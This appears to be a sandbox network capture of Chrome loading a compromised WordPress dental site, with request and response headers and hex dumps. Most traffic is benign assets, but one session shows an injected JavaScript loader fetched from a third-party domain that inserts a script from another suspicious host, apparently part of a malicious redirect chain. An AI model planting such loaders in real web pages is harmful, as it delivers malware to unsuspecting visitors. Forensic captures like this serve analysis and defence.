                                                                                                                                      2024-04-24 10:14:12 UTC16384INData Raw: a5 77 3b 94 dd c1 66 c2 31 60 60 05 b1 ec cf 1d ea 3f 37 60 01 21 4f 73 3b db 5c b6 7a a9 cd 93 fb 5b 6a 00 7c 41 e3 88 6c 61 1d f9 5a 50 20 b5 5a 64 0d ee 62 36 04 5b 50 f6 8b f7 e6 76 05 24 5f 88 d2 aa a8 21 a8 c9 7c 21 f4 c7 9a 20 c5 71 e0 4e 49 3c 09 1b 54 b7 2d d7 22 1f 49 a7 c7 90 17 ae 4f 53 5f 43 80 a9 04 8a b9 e9 34 48 9a 7a 3b 77 93 dc d1 21 35 38 89 50 54 8f 12 da 5d 29 2b b8 dd 0e a4 e4 43 91 a9 ae 66 7a 9e 99 ce 54 1d 7d 4c 3f 55 d1 66 5c b6 bd d7 89 3e 9e ed 8b 13 23 93 cf 89 e8 74 ea 98 f4 d8 50 f2 18 d9 9b 18 b0 8c 58 ad 47 10 d8 98 9d a8 df 11 f7 2c 46 3d 36 52 c0 db 57 17 13 f5 3d d8 f4 6f a9 db 44 f9 99 5a 4f 50 ce d8 8a 9c 8d b4 f8 8c 62 d2 64 65 df b8 f3 e2 6a 7a 7e 05 c4 d7 54 7e e2 ba a2 d9 75 25 47 36 67 a8 f4 fc 49 8b 4f 8d 07 06
                                                                                                                                      Data Ascii: w;f1``?7`!Os;\z[j|AlaZP Zdb6[Pv$_!|! qNI<T-"IOS_C4Hz;w!58PT])+CfzT}L?Uf\>#tPXG,F=6RW=oDZOPbdejz~T~u%G6gIO


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      122192.168.2.1649888153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:10 UTC823OUTGET /wp-content/themes/themify-shoppe/themify/themify-builder/css/modules/cover.css?ver=5.6.4 HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953647.0.0.0; _ga=GA1.1.97673467.1713953648; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953648.0.0.0
                                                                                                                                      2024-04-24 10:14:11 UTC579INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:11 GMT
                                                                                                                                      content-type: text/css
                                                                                                                                      last-modified: Mon, 15 May 2023 14:21:34 GMT
                                                                                                                                      etag: "24f-64623fee-c6a7d4b46215915a;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 591
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:11 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:11 UTC591INData Raw: 2e 62 75 69 6c 64 65 72 5f 72 6f 77 5f 63 6f 76 65 72 7b 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 30 3b 0a 20 20 20 20 63 6f 6e 74 61 69 6e 3a 73 74 72 69 63 74 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 5a 28 30 29 0a 7d 0a 2e 62 75 69 6c 64 65 72 5f 72 6f 77 5f 63 6f 76 65 72 3a 62 65 66 6f 72 65 2c 0a 2e 62 75 69 6c 64 65 72 5f 72 6f 77 5f 63 6f 76 65 72 3a 61 66 74 65 72 7b 0a 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 30 3b 20 0a 20 20 20 20 6c 65 66 74 3a 30 3b 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 2d 31 30 30 3b 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 27 27 3b 0a 20 20 20
                                                                                                                                      Data Ascii: .builder_row_cover{ z-index:0; contain:strict; transform:translateZ(0)}.builder_row_cover:before,.builder_row_cover:after{ height:100%; width:100%; position:absolute; top:0; left:0; z-index:-100; content:'';


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      123192.168.2.164988531.41.44.1094437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:10 UTC523OUTGET /9hFXWz7m HTTP/1.1
                                                                                                                                      Host: debasesingle.life
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:11 UTC767INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:14:11 GMT
                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                      Content-Length: 247
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                      Expires: Wed, 24 Apr 2024 10:14:11 GMT
                                                                                                                                      Set-Cookie: _subid=2vk1oobld9egb; expires=Sat, 25 May 2024 10:14:11 GMT; path=/
                                                                                                                                      Set-Cookie: 7e4fc=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjQ3MTdcIjoxNzEzOTUzNjUxLFwiNDY4NlwiOjE3MTM5NTM2NTEsXCI0Njc4XCI6MTcxMzk1MzY1MX0sXCJjYW1wYWlnbnNcIjp7XCIxNDVcIjoxNzEzOTUzNjUxLFwiMjI5XCI6MTcxMzk1MzY1MSxcIjIyOFwiOjE3MTM5NTM2NTF9LFwidGltZVwiOjE3MTM5NTM2NTF9In0.Ccupw68y7IQX2yK0QosWBDRBALg36tJJ5bpsI8kQum4; expires=Fri, 19 Aug 2078 20:28:22 GMT; path=/
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      2024-04-24 10:14:11 UTC247INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 71 2c 66 2c 65 2c 77 2c 6a 29 7b 77 3d 71 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 66 29 3b 6a 3d 71 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 66 29 5b 30 5d 3b 77 2e 61 73 79 6e 63 3d 31 3b 77 2e 73 72 63 3d 65 3b 6a 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 77 2c 6a 29 3b 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 68 74 74 70 73 3a 2f 2f 73 74 61 6b 65 2e 6c 69 62 65 72 74 61 72 69 61 6e 63 6f 75 6e 74 65 72 70 6f 69 6e 74 2e 63 6f 6d 2f 2b 36 4e 36 37 59 43 42 47 59 53 66 67 55 44 66 7a 5a 42 57 7a 34 6d 42 51 4d 2b 58 30 52 79 47 69 38 30 4e 6a 4a 2f 46 46 34 65 4a 77 56 69 51 27 29 3b
                                                                                                                                      Data Ascii: ;(function(o,q,f,e,w,j){w=q.createElement(f);j=q.getElementsByTagName(f)[0];w.async=1;w.src=e;j.parentNode.insertBefore(w,j);})(window,document,'script','https://stake.libertariancounterpoint.com/+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQ');


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      124192.168.2.1649889198.35.26.1124437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:11 UTC643OUTGET /wikipedia/commons/e/e1/Google_Chrome_icon_%28February_2022%29.svg HTTP/1.1
                                                                                                                                      Host: upload.wikimedia.org
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:11 UTC1081INHTTP/1.1 200 OK
                                                                                                                                      date: Tue, 23 Apr 2024 17:22:20 GMT
                                                                                                                                      server: ATS/9.1.4
                                                                                                                                      etag: W/e82c3cd8c7349ab13088920527e4d317
                                                                                                                                      content-type: image/svg+xml
                                                                                                                                      x-object-meta-sha1base36: 1vc2zybkk5xibh4d60xopyi02w7gcdh
                                                                                                                                      last-modified: Sun, 15 Oct 2023 14:21:39 GMT
                                                                                                                                      vary: Accept-Encoding
                                                                                                                                      age: 60710
                                                                                                                                      x-cache: cp4048 hit, cp4048 hit/35
                                                                                                                                      x-cache-status: hit-front
                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp4048"
                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                      x-client-ip: 154.16.105.36
                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                      access-control-allow-origin: *
                                                                                                                                      access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                                                                                                                      timing-allow-origin: *
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 1429
                                                                                                                                      connection: close
                                                                                                                                      2024-04-24 10:14:11 UTC1429INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 77 69 64 74 68 3d 22 34 38 22 3e 3c 64 65 66 73 3e 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 61 22 20 78 31 3d 22 33 2e 32 31 37 33 22 20 79 31 3d 22 31 35 22 20 78 32 3d 22 34 34 2e 37 38 31 32 22 20 79 32 3d 22 31 35 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d
                                                                                                                                      Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 48 48" height="48" width="48"><defs><linearGradient id="a" x1="3.2173" y1="15" x2="44.7812" y2="15" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      125192.168.2.1649890153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:11 UTC589OUTGET /wp-content/uploads/2021/06/ExodoniaBWML.png HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953647.0.0.0; _ga=GA1.1.97673467.1713953648; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953648.0.0.0
                                                                                                                                      2024-04-24 10:14:12 UTC579INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:12 GMT
                                                                                                                                      content-type: image/png
                                                                                                                                      last-modified: Mon, 15 May 2023 14:21:21 GMT
                                                                                                                                      etag: "ba-64623fe1-b56b6ec015d665dc;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 186
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:12 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:12 UTC186INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 23 08 06 00 00 00 8e ca ca 96 00 00 00 81 49 44 41 54 78 da 63 f8 ff ff 3f 03 2d 31 c3 f0 b1 40 40 2f 64 21 10 ff a7 16 6e 9f b6 32 76 d4 02 aa 59 f0 0e 88 ef 92 8a 81 16 04 10 65 01 50 61 3d b9 29 68 d4 82 51 0b 20 d8 3b a9 6e 1d d0 92 58 22 b1 35 ad cb a2 85 a3 16 50 df 02 60 24 ef 07 a5 24 22 71 c0 e0 4b a6 a3 16 8c 5a 30 04 2c 80 95 a6 a4 e2 c3 a7 ae 28 0d 9a 66 cb a8 05 10 0b 40 25 21 10 d7 53 0b 03 23 59 8f 2e fd 03 00 65 ad 87 b1 c3 8d 2d 56 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                      Data Ascii: PNGIHDR#IDATxc?-1@@/d!n2vYePa=)hQ ;nX"5P`$$"qKZ0,(f@%!S#Y.e-VIENDB`


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      126192.168.2.1649894198.35.26.1124437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:12 UTC409OUTGET /wikipedia/commons/e/e1/Google_Chrome_icon_%28February_2022%29.svg HTTP/1.1
                                                                                                                                      Host: upload.wikimedia.org
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:12 UTC1081INHTTP/1.1 200 OK
                                                                                                                                      date: Tue, 23 Apr 2024 17:22:20 GMT
                                                                                                                                      server: ATS/9.1.4
                                                                                                                                      etag: W/e82c3cd8c7349ab13088920527e4d317
                                                                                                                                      content-type: image/svg+xml
                                                                                                                                      x-object-meta-sha1base36: 1vc2zybkk5xibh4d60xopyi02w7gcdh
                                                                                                                                      last-modified: Sun, 15 Oct 2023 14:21:39 GMT
                                                                                                                                      vary: Accept-Encoding
                                                                                                                                      age: 60711
                                                                                                                                      x-cache: cp4048 hit, cp4048 hit/36
                                                                                                                                      x-cache-status: hit-front
                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp4048"
                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                      x-client-ip: 154.16.105.36
                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                      access-control-allow-origin: *
                                                                                                                                      access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                                                                                                                      timing-allow-origin: *
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 1429
                                                                                                                                      connection: close
                                                                                                                                      2024-04-24 10:14:12 UTC1429INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 77 69 64 74 68 3d 22 34 38 22 3e 3c 64 65 66 73 3e 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 61 22 20 78 31 3d 22 33 2e 32 31 37 33 22 20 79 31 3d 22 31 35 22 20 78 32 3d 22 34 34 2e 37 38 31 32 22 20 79 32 3d 22 31 35 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d
                                                                                                                                      Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 48 48" height="48" width="48"><defs><linearGradient id="a" x1="3.2173" y1="15" x2="44.7812" y2="15" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      127192.168.2.1649891153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:12 UTC795OUTGET /wp-content/themes/themify-shoppe/themify/js/modules/edge.Menu.js?ver=5.6.4 HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga=GA1.1.97673467.1713953648; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953648.0.0.0; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953650.0.0.0
                                                                                                                                      2024-04-24 10:14:12 UTC597INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:12 GMT
                                                                                                                                      content-type: application/x-javascript
                                                                                                                                      last-modified: Mon, 15 May 2023 14:21:35 GMT
                                                                                                                                      etag: "1c02-64623fef-fcd3bd1f3777c983;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 7170
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:12 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:12 UTC7170INData Raw: 2f 2a 2a 0d 0a 20 2a 45 64 67 65 20 6d 65 6e 75 20 6d 6f 64 75 6c 65 0d 0a 20 2a 2f 0d 0a 3b 0d 0a 28 28 24 2c 20 64 6f 63 29 3d 3e 7b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 6d 6f 75 73 65 45 6e 74 65 72 3d 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 09 09 09 63 6f 6e 73 74 20 74 61 72 67 65 74 20 3d 20 74 68 69 73 2e 74 61 67 4e 61 6d 65 20 3d 3d 3d 20 27 41 27 20 3f 20 74 68 69 73 2e 70 61 72 65 6e 74 4e 6f 64 65 20 3a 20 74 68 69 73 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 20 70 72 65 76 65 6e 74 20 22 65 64 67 65 22 20 63 6c 61 73 73 6e 61 6d 65 20 62 65 69 6e 67 20 72 65 6d 6f 76 65 64 20 62 79 20 6d 6f 75 73 65 6c 65 61 76 65 20 65 76 65 6e 74 20 77 68 65 6e 20 66 6c 69 70 70 69 6e 67 20 74 68 72 6f 75 67 68 20 6d 65 6e 75 20 69 74 65 6d 73
                                                                                                                                      Data Ascii: /** *Edge menu module */;(($, doc)=>{ const mouseEnter=function () {const target = this.tagName === 'A' ? this.parentNode : this; /* prevent "edge" classname being removed by mouseleave event when flipping through menu items


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      128192.168.2.1649892185.158.251.2404437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:12 UTC579OUTGET /+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQ HTTP/1.1
                                                                                                                                      Host: stake.libertariancounterpoint.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:15 UTC165INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:14:15 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 10:14:15 UTC209INData Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                                                                                                      2024-04-24 10:14:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      129192.168.2.1649893153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:12 UTC809OUTGET /wp-content/themes/themify-shoppe/styles/modules/filters/none.css?ver=5.7.0 HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga=GA1.1.97673467.1713953648; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953648.0.0.0; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953650.0.0.0
                                                                                                                                      2024-04-24 10:14:12 UTC579INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:12 GMT
                                                                                                                                      content-type: text/css
                                                                                                                                      last-modified: Mon, 15 May 2023 14:21:36 GMT
